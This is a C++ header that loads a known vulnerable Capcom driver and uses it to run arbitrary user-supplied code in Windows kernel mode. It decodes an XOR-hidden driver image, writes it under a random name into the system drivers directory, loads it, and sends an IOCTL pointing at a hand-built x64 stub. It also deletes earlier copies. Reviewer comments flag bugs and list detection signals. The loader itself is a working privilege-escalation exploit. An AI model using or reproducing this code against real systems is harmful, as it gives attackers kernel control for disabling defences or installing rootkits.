#pragma once
#include <filesystem>
#include <iostream>
#include <fstream>
#include "CapcomResource.h"
#include "DriverLoader.h"
#include "LockedMemory.h"
// Control code passed to the Capcom device by CapcomContext::ExecuteInKernel.
// Being a fixed constant, it is a usable match criterion when monitoring or
// blocking DeviceIoControl traffic to this driver.
#define IOCTL_RunPayload64 0xAA013044
#pragma pack(push, 1)
// Packed (see the surrounding #pragma pack(push, 1)): the byte fields from
// MovabsRaxData through JmpRax form one contiguous x64 code stub that the
// driver is pointed at, so any padding between them would corrupt it.
struct CapcomContext
{
    // Shapes of the kernel-side callback: with an opaque context argument,
    // or without one.
    using FnCapcomCb = void( __stdcall*)( PVOID );
    using FnCapcomCbNoCtx = void(__stdcall*)();

    // Set by ExecuteInKernel to the address of the byte right after itself,
    // i.e. the first byte of the stub (MovabsRaxData).
    uint64_t BufferPointer;

    // Inline stub, patched per call: load DataSource into rax, copy it to
    // rcx, load Destination into rax, jump to it.
    uint8_t MovabsRaxData[ 0x2 ] = { 0x48, 0xB8 }; // mov rax, imm64 (operand is DataSource)
    uint64_t DataSource; // imm64 operand of the instruction above; set to Ctx
    uint8_t MovRdxRax[ 0x3 ] = { 0x48, 0x89, 0xC1 }; // mov rcx, rax -- the name says rdx, the bytes encode rcx (first x64 argument register)
    uint8_t MovabsRax[ 0x2 ] = { 0x48, 0xB8 }; // mov rax, imm64 (operand is Destination)
    uint64_t Destination; // imm64 operand of the instruction above; set to the callback
    uint8_t JmpRax[ 0x2 ] = { 0xFF, 0xE0 }; // jmp rax

    // Handle to the opened Capcom device and the randomly generated name the
    // driver was loaded under; both are filled in by Cl_InitContext.
    HANDLE CapcomDevice;
    std::wstring CapcomDriverName;

    // Stores the device handle and driver name; does not touch the stub.
    CapcomContext( std::wstring DriverName, HANDLE Device )
    {
        this->CapcomDriverName = DriverName;
        this->CapcomDevice = Device;
    }

    // Asks the driver to run Destination( Ctx ) in kernel mode.
    // Neither the DeviceIoControl return value nor Status is examined, so a
    // failed or rejected request looks exactly like a successful one here.
    void ExecuteInKernel( FnCapcomCb Destination, PVOID Ctx = 0 )
    {
        this->Destination = ( uint64_t ) Destination;
        // Practically never-taken branch (the timestamp counter is not zero
        // on a running system); the original author's stated purpose is to
        // keep the optimizer from discarding the stores into the stub fields.
        if ( __rdtsc() == 0 )
            Destination( 0 );
        DWORD Status = 0x0;
        DWORD BytesReturned = 0x0;
        this->DataSource = ( uint64_t ) Ctx;
        // Pointer arithmetic on uint64_t*: one past BufferPointer is the
        // address of MovabsRaxData, the start of the stub.
        this->BufferPointer = ( uint64_t ) ( &this->BufferPointer + 1 );
        // The input buffer is the 8-byte BufferPointer field itself, so the
        // driver receives a pointer to a pointer to the stub.
        DeviceIoControl
        (
            CapcomDevice,
            IOCTL_RunPayload64,
            &this->BufferPointer,
            sizeof( uint64_t ),
            &Status,
            sizeof( Status ),
            &BytesReturned,
            0
        );
    }

    // Overload for callbacks that take no argument; after the cast the callee
    // simply ignores the rcx value the stub passes.
    void ExecuteInKernel( FnCapcomCbNoCtx Fn, PVOID Ctx = 0 )
    {
        this->ExecuteInKernel( ( FnCapcomCb )( Fn ), Ctx );
    }
};
#pragma pack(pop)
// Decodes the embedded driver image in place on first use: if its first byte
// is not 0x4D ('M' of the MZ signature) the blob is taken to be still
// XOR-encoded and every byte is XORed with CAPCOM_DRIVER_XOR_KEY (both
// presumably defined in CapcomResource.h). Mutates the global buffer; once
// the check passes, later calls do nothing. The image therefore only exists
// in plaintext in memory, never on disk until Cl_InitContext writes it.
static void Cl_AssertDecrypted()
{
    if ( CAPCOM_DRIVER[ 0 ] != 0x4D )
    {
        for ( BYTE& b : CAPCOM_DRIVER )
            b ^= CAPCOM_DRIVER_XOR_KEY;
    }
}
// Returns "<system directory>\drivers\" (trailing backslash included): the
// directory the embedded driver is written to and later scanned for copies.
// NOTE(review): the GetSystemDirectoryW result is not checked; if the call
// fails, SystemDirectory is left uninitialized and is still copied out.
static std::wstring Cl_GetDriverPath()
{
    wchar_t SystemDirectory[ 2048 ];
    GetSystemDirectoryW( SystemDirectory, 2048 ); // size argument is in WCHARs
    std::wstring DriverPath = SystemDirectory;
    DriverPath += L"\\drivers\\";
    return DriverPath;
}
// Deletes every file in the drivers directory whose path contains ".sys" and
// whose first 1024 bytes equal the first 1024 bytes of Driver -- i.e. earlier
// copies of the embedded driver left behind under other random names.
// Driver must point at at least 1024 readable bytes.
// Returns 0 when every matching file was deleted and nonzero otherwise; despite
// the NTSTATUS type the value is a pass/fail flag, not a real status code.
// Side effects worth noting: file deletions in the system drivers directory,
// driver unloads by derived service name, and printf output for each attempt.
static NTSTATUS Cl_RemoveSimilarDrivers( BYTE* Driver )
{
    // NOTE(review): the file includes <filesystem> but uses the experimental
    // TS namespace here; which one resolves depends on the toolchain.
    namespace fs = std::experimental::filesystem;
    std::wstring DriverPath = Cl_GetDriverPath();
    NTSTATUS Status = STATUS_SUCCESS;
    for ( auto& File : fs::directory_iterator( DriverPath ) )
    {
        std::wstring Path = File.path();
        // npos converts to -1 in this comparison, so this means "contains
        // .sys anywhere in the path", not "has the .sys extension".
        if ( Path.find( L".sys" ) != -1 )
        {
            // Data is not zeroed and a short read is not detected, so for a
            // file shorter than 1024 bytes the memcmp includes stale stack bytes.
            std::ifstream FileStr( File, std::ios::binary );
            char Data[ 1024 ];
            FileStr.read( Data, 1024 );
            FileStr.close();
            if ( !memcmp( Driver, Data, 1024 ) )
            {
                bool Deleted = DeleteFileW( Path.c_str() );
                printf( "[+] DeleteFile (%ls) : %x\n", Path.c_str(), Deleted );
                if ( !Deleted )
                {
                    // Presumably the file is still held by a loaded driver:
                    // take the file stem as the service name (Cl_InitContext
                    // loads the driver under the stem), unload, retry once.
                    int StrEnd = Path.find( L".sys" );
                    int StrStart = Path.rfind( L"\\", StrEnd );
                    std::wstring DriverName = Path.substr( StrStart + 1, StrEnd - StrStart - 1 ).c_str();
                    Dl_UnloadDriver( DriverName.c_str() );
                    Deleted = DeleteFileW( Path.c_str() );
                    printf( "[+] DeleteFile2 (%ls) : %x\n", Path.c_str(), Deleted );
                }
                Status |= !Deleted; // becomes nonzero on any failed deletion
            }
        }
    }
    return Status;
}
// Tears down a context returned by Cl_InitContext: closes the device handle,
// unloads the driver, deletes the dropped .sys file(s) and frees the page.
// Returns TRUE on full cleanup, FALSE if the unload or the file removal failed.
// NOTE(review): on the FALSE paths the handle is already closed but Ctx is
// never freed. MEM_FREE is also not an accepted VirtualFree dwFreeType
// (MEM_RELEASE is), so the final call fails silently and the RWX page leaks
// on every path; Cl_InitContext's error paths make the same call.
static BOOL Cl_FreeContext( CapcomContext* Ctx )
{
    Cl_AssertDecrypted(); // the plaintext image is needed for the file comparison below
    CloseHandle( Ctx->CapcomDevice );
    if ( Dl_UnloadDriver( Ctx->CapcomDriverName.c_str() ) )
        return FALSE;
    if ( Cl_RemoveSimilarDrivers( CAPCOM_DRIVER ) )
        return FALSE;
    VirtualFree( Ctx, 0, MEM_FREE );
    return TRUE;
}
// Writes the embedded driver under a random 12-letter name into the drivers
// directory, loads it, opens its device and returns a CapcomContext placed in
// a fresh RWX page. Returns 0 on any failure after printing a message and
// attempting cleanup; callers must null-check the result.
// Observable artifacts of a successful call: a new <A-T>{12}.sys file in the
// system drivers directory, a driver load under that name, an open handle to
// device "Htsysm72FB", and a PAGE_EXECUTE_READWRITE private allocation in
// this process -- each of these is a reasonable detection signal.
static CapcomContext* Cl_InitContext()
{
    Cl_AssertDecrypted();
    // RWX presumably because the stub bytes inside the struct are executed.
    // NOTE(review): the VirtualAlloc result is not null-checked, and MEM_FREE
    // is not an accepted VirtualFree flag (MEM_RELEASE is), so the frees on
    // the error paths below do not actually release the page.
    CapcomContext* AllocatedContext = ( CapcomContext* ) ( VirtualAlloc( 0, sizeof( CapcomContext ), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ) );
    // 12 letters drawn from 'A'..'T' (rand() % 20), seeded from the
    // timestamp counter; this is also the service name the driver loads under.
    std::wstring CapcomDriverName = L"";
    srand( __rdtsc() );
    for ( int i = 0; i < 12; i++ )
        CapcomDriverName += wchar_t( L'A' + rand() % 20 );
    std::wstring DriverPath = Cl_GetDriverPath() + CapcomDriverName + L".sys";
    // Clear out copies left behind by earlier runs before dropping a new one.
    if ( Cl_RemoveSimilarDrivers( CAPCOM_DRIVER ) )
    {
        printf( "[+] Failed to remove similar drivers!\n" );
        VirtualFree( AllocatedContext, 0, MEM_FREE );
        return 0;
    }
    std::ofstream file( DriverPath, std::ios::binary );
    if ( !file.good() )
    {
        printf( "[+] Failed to create file!\n" );
        VirtualFree( AllocatedContext, 0, MEM_FREE );
        return 0;
    }
    // The decoded image is written to disk here, so it is plaintext on disk
    // from this point until Cl_RemoveSimilarDrivers deletes it.
    file.write( ( char* ) CAPCOM_DRIVER, sizeof( CAPCOM_DRIVER ) );
    file.close();
    if ( Dl_LoadDriver( CapcomDriverName.c_str() ) )
    {
        printf( "[+] Failed to load driver!\n" );
        // NOTE(review): this spins forever, so the cleanup and return below
        // are unreachable and a failed load leaves the dropped file in place.
        while ( 1 );
        Cl_RemoveSimilarDrivers( CAPCOM_DRIVER );
        VirtualFree( AllocatedContext, 0, MEM_FREE );
        return 0;
    }
    // Fixed device name exposed by the driver; a failure here unloads the
    // driver and deletes the file again.
    HANDLE Device = Dl_OpenDevice( "Htsysm72FB" );
    if ( !Device )
    {
        printf( "[+] Failed to open device!\n" );
        Dl_UnloadDriver( CapcomDriverName.c_str() );
        Cl_RemoveSimilarDrivers( CAPCOM_DRIVER );
        VirtualFree( AllocatedContext, 0, MEM_FREE );
        return 0;
    }
    // Placement new: construct the context inside the already-allocated page.
    new ( AllocatedContext ) CapcomContext( CapcomDriverName, Device );
    return AllocatedContext;
}